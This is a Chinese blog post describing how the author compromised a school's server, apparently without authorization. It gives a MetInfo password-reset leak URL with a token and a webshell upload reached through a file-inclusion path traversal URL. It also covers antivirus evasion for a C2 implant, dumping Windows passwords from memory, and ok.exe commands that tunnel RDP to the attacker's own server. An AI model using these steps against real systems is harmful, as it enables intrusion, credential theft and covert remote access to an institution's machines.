前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >记一次运气拿下某校一台服务器

记一次运气拿下某校一台服务器

作者头像
字节脉搏实验室
发布2021-05-31 16:13:40
6280
发布2021-05-31 16:13:40
举报

(打点)重置后台密码---metinfo信息泄露

自己搭建环境复现:

1、下载MetInfo 5.2.1到phpStudy的WWW目录下,开启phpStudy(注意php的版本问题,最好使用php5);

2、选择一个搭建metinfo可以ping通的机器,并在该机器上进行监听(kail进行监听)

3、在burp中构造如下请求:

注意:用户或者邮箱必须要存在,邮箱不知道可以直接写用户名(admin),前台文章发表出可以看见有admin用户

4、此时kail监听收到信息

5、此时访问网址,便可直接修改密码

http://127.0.0.1:8081/admin/admin/getpassword.php?p=6734pBcR5lhEk5um0stWx9YFD7AxylrcV8NjCThNte%2B9UbYjPD2CC0HlpGLC8IPL2PC2wvmcHPSd5Fhdj4et%2B0Nduw

6、修改密码即可

(webshell)后台上传图片,文件包含读取,webshell

后来才发现 5.1.7的版本存在文件包含,而5.2.6版本存在文件覆盖

上传图片马,利用文件包含漏洞

选择系统设置,

坑点(太坑了,搞了大半天,呜呜呜)

因为环境是本地搭建的,和当时实战的环境有很大的区别,所以要上传一个png的图片马

且要求:

1、只带有png的标志位的

小tip:将文件后缀改为txt,然后在加上一句话木马

666.png

  • 上传之后进行修改名称为666.php
  • 访问路径即可:http://127.0.0.1:8081//index.php?index=a&skin=default/../&dataoptimize_html=/../../upload/file/666.png

上传exe(实战环境中)

1、拿到webshel之后,此时进行命令执行 查看用户权限,权限还是比较高的。(还查了版本信息)

2、进行监听

新增一个监听器

下载之后上传,发现会被360给杀掉,所以想着免杀

免杀,上传,执行,上线

1、免杀生成

2、接着在文件列表中找到相应的文件下载

3、放入到网站中,发现没有被杀,并成功执行命令,上线

成功获取到账号密码步骤如下

1、在三角尖的下拉框中选择“获取windows内存密码”

2、点击实时输出,便可查看相应的执行结果

内网穿透,利用密码登录(端口映射:将3389端口映射到本地,使其可以直接远程连接)

1、将端口映射工具上传到网站上

2、首先在服务器上建立监听,等待连接

ok.exe -listen 6661 3624

3、开始在菜刀上执行映射命令

ok.exe -remote 自己服务器ip 3624 127.0.0.1 3389

4、在自己服务器上远程桌面连接 127.0.0.1:6666 输入上面获得的账号密码即可

错误之处还望各位师傅帮忙指正,谢谢

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-05-08,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 字节脉搏实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • (webshell)后台上传图片,文件包含读取,webshell
    • 上传图片马,利用文件包含漏洞
      • 坑点(太坑了,搞了大半天,呜呜呜)
  • 上传exe(实战环境中)
    • 免杀,上传,执行,上线
    • 成功获取到账号密码步骤如下
    • 内网穿透,利用密码登录(端口映射:将3389端口映射到本地,使其可以直接远程连接)
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档